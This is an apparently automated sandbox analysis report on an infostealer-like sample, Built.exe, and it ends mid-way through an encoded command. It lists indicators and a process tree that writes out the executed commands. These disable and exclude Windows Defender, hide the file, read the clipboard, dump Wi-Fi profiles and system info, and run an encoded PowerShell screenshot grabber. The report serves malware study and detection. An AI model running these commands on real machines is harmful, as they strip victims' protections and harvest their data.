2692	powershell.exe
4156	powershell.exe
4156	powershell.exe
4156	powershell.exe
2580	powershell.exe
2580	powershell.exe
1092	powershell.exe
1092	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1248	powershell.exe
Token: SeDebugPrivilege	3344	powershell.exe
Token: SeIncreaseQuotaPrivilege	3488	WMIC.exe
Token: SeSecurityPrivilege	3488	WMIC.exe
Token: SeTakeOwnershipPrivilege	3488	WMIC.exe
Token: SeLoadDriverPrivilege	3488	WMIC.exe
Token: SeSystemProfilePrivilege	3488	WMIC.exe
Token: SeSystemtimePrivilege	3488	WMIC.exe
Token: SeProfSingleProcessPrivilege	3488	WMIC.exe
Token: SeIncBasePriorityPrivilege	3488	WMIC.exe
Token: SeCreatePagefilePrivilege	3488	WMIC.exe
Token: SeBackupPrivilege	3488	WMIC.exe
Token: SeRestorePrivilege	3488	WMIC.exe
Token: SeShutdownPrivilege	3488	WMIC.exe
Token: SeDebugPrivilege	3488	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3488	WMIC.exe
Token: SeRemoteShutdownPrivilege	3488	WMIC.exe
Token: SeUndockPrivilege	3488	WMIC.exe
Token: SeManageVolumePrivilege	3488	WMIC.exe
Token: 33	3488	WMIC.exe
Token: 34	3488	WMIC.exe
Token: 35	3488	WMIC.exe
Token: 36	3488	WMIC.exe
Token: SeDebugPrivilege	4412	tasklist.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeIncreaseQuotaPrivilege	3488	WMIC.exe
Token: SeSecurityPrivilege	3488	WMIC.exe
Token: SeTakeOwnershipPrivilege	3488	WMIC.exe
Token: SeLoadDriverPrivilege	3488	WMIC.exe
Token: SeSystemProfilePrivilege	3488	WMIC.exe
Token: SeSystemtimePrivilege	3488	WMIC.exe
Token: SeProfSingleProcessPrivilege	3488	WMIC.exe
Token: SeIncBasePriorityPrivilege	3488	WMIC.exe
Token: SeCreatePagefilePrivilege	3488	WMIC.exe
Token: SeBackupPrivilege	3488	WMIC.exe
Token: SeRestorePrivilege	3488	WMIC.exe
Token: SeShutdownPrivilege	3488	WMIC.exe
Token: SeDebugPrivilege	3488	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3488	WMIC.exe
Token: SeRemoteShutdownPrivilege	3488	WMIC.exe
Token: SeUndockPrivilege	3488	WMIC.exe
Token: SeManageVolumePrivilege	3488	WMIC.exe
Token: 33	3488	WMIC.exe
Token: 34	3488	WMIC.exe
Token: 35	3488	WMIC.exe
Token: 36	3488	WMIC.exe
Token: SeDebugPrivilege	3960	bound.exe
Token: SeIncreaseQuotaPrivilege	2972	WMIC.exe
Token: SeSecurityPrivilege	2972	WMIC.exe
Token: SeTakeOwnershipPrivilege	2972	WMIC.exe
Token: SeLoadDriverPrivilege	2972	WMIC.exe
Token: SeSystemProfilePrivilege	2972	WMIC.exe
Token: SeSystemtimePrivilege	2972	WMIC.exe
Token: SeProfSingleProcessPrivilege	2972	WMIC.exe
Token: SeIncBasePriorityPrivilege	2972	WMIC.exe
Token: SeCreatePagefilePrivilege	2972	WMIC.exe
Token: SeBackupPrivilege	2972	WMIC.exe
Token: SeRestorePrivilege	2972	WMIC.exe
Token: SeShutdownPrivilege	2972	WMIC.exe
Token: SeDebugPrivilege	2972	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2972	WMIC.exe
Token: SeRemoteShutdownPrivilege	2972	WMIC.exe
Token: SeUndockPrivilege	2972	WMIC.exe
Token: SeManageVolumePrivilege	2972	WMIC.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3960	bound.exe
3960	bound.exe
3960	bound.exe
3960	bound.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1008 wrote to memory of 3456	1008	Built.exe	85
PID 1008 wrote to memory of 3456	1008	Built.exe	85
PID 3456 wrote to memory of 624	3456	Built.exe	88
PID 3456 wrote to memory of 624	3456	Built.exe	88
PID 3456 wrote to memory of 2440	3456	Built.exe	89
PID 3456 wrote to memory of 2440	3456	Built.exe	89
PID 624 wrote to memory of 1248	624	cmd.exe	92
PID 624 wrote to memory of 1248	624	cmd.exe	92
PID 3456 wrote to memory of 1568	3456	Built.exe	93
PID 3456 wrote to memory of 1568	3456	Built.exe	93
PID 3456 wrote to memory of 3580	3456	Built.exe	94
PID 3456 wrote to memory of 3580	3456	Built.exe	94
PID 3456 wrote to memory of 3364	3456	Built.exe	97
PID 3456 wrote to memory of 3364	3456	Built.exe	97
PID 3456 wrote to memory of 3464	3456	Built.exe	99
PID 3456 wrote to memory of 3464	3456	Built.exe	99
PID 2440 wrote to memory of 3344	2440	cmd.exe	100
PID 2440 wrote to memory of 3344	2440	cmd.exe	100
PID 3364 wrote to memory of 4412	3364	cmd.exe	102
PID 3364 wrote to memory of 4412	3364	cmd.exe	102
PID 3464 wrote to memory of 3488	3464	cmd.exe	133
PID 3464 wrote to memory of 3488	3464	cmd.exe	133
PID 1568 wrote to memory of 2948	1568	cmd.exe	104
PID 1568 wrote to memory of 2948	1568	cmd.exe	104
PID 3580 wrote to memory of 3960	3580	cmd.exe	105
PID 3580 wrote to memory of 3960	3580	cmd.exe	105
PID 3580 wrote to memory of 3960	3580	cmd.exe	105
PID 3456 wrote to memory of 3392	3456	Built.exe	108
PID 3456 wrote to memory of 3392	3456	Built.exe	108
PID 3392 wrote to memory of 1664	3392	cmd.exe	110
PID 3392 wrote to memory of 1664	3392	cmd.exe	110
PID 3456 wrote to memory of 5000	3456	Built.exe	111
PID 3456 wrote to memory of 5000	3456	Built.exe	111
PID 5000 wrote to memory of 3524	5000	cmd.exe	113
PID 5000 wrote to memory of 3524	5000	cmd.exe	113
PID 3456 wrote to memory of 3596	3456	Built.exe	114
PID 3456 wrote to memory of 3596	3456	Built.exe	114
PID 3960 wrote to memory of 5024	3960	bound.exe	116
PID 3960 wrote to memory of 5024	3960	bound.exe	116
PID 3960 wrote to memory of 5024	3960	bound.exe	116
PID 3596 wrote to memory of 2972	3596	cmd.exe	118
PID 3596 wrote to memory of 2972	3596	cmd.exe	118
PID 3960 wrote to memory of 1684	3960	bound.exe	119
PID 3960 wrote to memory of 1684	3960	bound.exe	119
PID 3960 wrote to memory of 1684	3960	bound.exe	119
PID 3456 wrote to memory of 2524	3456	Built.exe	120
PID 3456 wrote to memory of 2524	3456	Built.exe	120
PID 2524 wrote to memory of 2864	2524	cmd.exe	123
PID 2524 wrote to memory of 2864	2524	cmd.exe	123
PID 1684 wrote to memory of 2672	1684	cmd.exe	124
PID 1684 wrote to memory of 2672	1684	cmd.exe	124
PID 1684 wrote to memory of 2672	1684	cmd.exe	124
PID 2672 wrote to memory of 1788	2672	hapint.exe	190
PID 2672 wrote to memory of 1788	2672	hapint.exe	190
PID 3456 wrote to memory of 4600	3456	Built.exe	199
PID 3456 wrote to memory of 4600	3456	Built.exe	199
PID 3456 wrote to memory of 792	3456	Built.exe	128
PID 3456 wrote to memory of 792	3456	Built.exe	128
PID 3456 wrote to memory of 372	3456	Built.exe	131
PID 3456 wrote to memory of 372	3456	Built.exe	131
PID 792 wrote to memory of 3952	792	cmd.exe	132
PID 792 wrote to memory of 3952	792	cmd.exe	132
PID 3456 wrote to memory of 3488	3456	Built.exe	133
PID 3456 wrote to memory of 3488	3456	Built.exe	133

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1308	attrib.exe
5104	attrib.exe
3180	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1008
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:624
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1568
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3580
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3960
    - - C:\Windows\temp\{8DB5C695-D425-455C-84E6-2908B1F93687}\miniunz.exe
        
        -x C:\Windows\temp\{8DB5C695-D425-455C-84E6-2908B1F93687}\hapi.zip -o -d C:\Windows\temp\{8DB5C695-D425-455C-84E6-2908B1F93687}
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5024
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Windows\temp\{8DB5C695-D425-455C-84E6-2908B1F93687}\hapinst.bat" install"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1684
      - C:\Windows\Temp\{8DB5C695-D425-455C-84E6-2908B1F93687}\hapi\hapint.exe
        
        hapint -k SPHAPIDA5 -p C:\Windows\hapint.exe -q
        6⤵
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Windows directory
        Suspicious use of WriteProcessMemory
        
        PID:2672
        
        C:\Windows\Temp\{8DB5C695-D425-455C-84E6-2908B1F93687}\hapi\dcmdev64.exe
        
        dcmdev64.exe remove root\dcdbas
        7⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        
        PID:1788
        
        C:\Windows\Temp\{8DB5C695-D425-455C-84E6-2908B1F93687}\hapi\dcmdev64.exe
        
        dcmdev64.exe install .\dcdbas64.inf root\dcdbas
        7⤵
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Windows directory
        Checks SCSI registry key(s)
        
        PID:1192
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1788
        
        C:\Windows\Temp\{8DB5C695-D425-455C-84E6-2908B1F93687}\hapi\dchcfg32.exe
        
        dchcfg32.exe command=getsupportedsystypes
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3364
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3464
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3392
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5000
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3596
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    PID:4600
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      Views/modifies file attributes
      PID:1308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:372
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3488
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4164
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:1016
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3012
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2372
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:4220
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:2160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3356
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1948
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQAL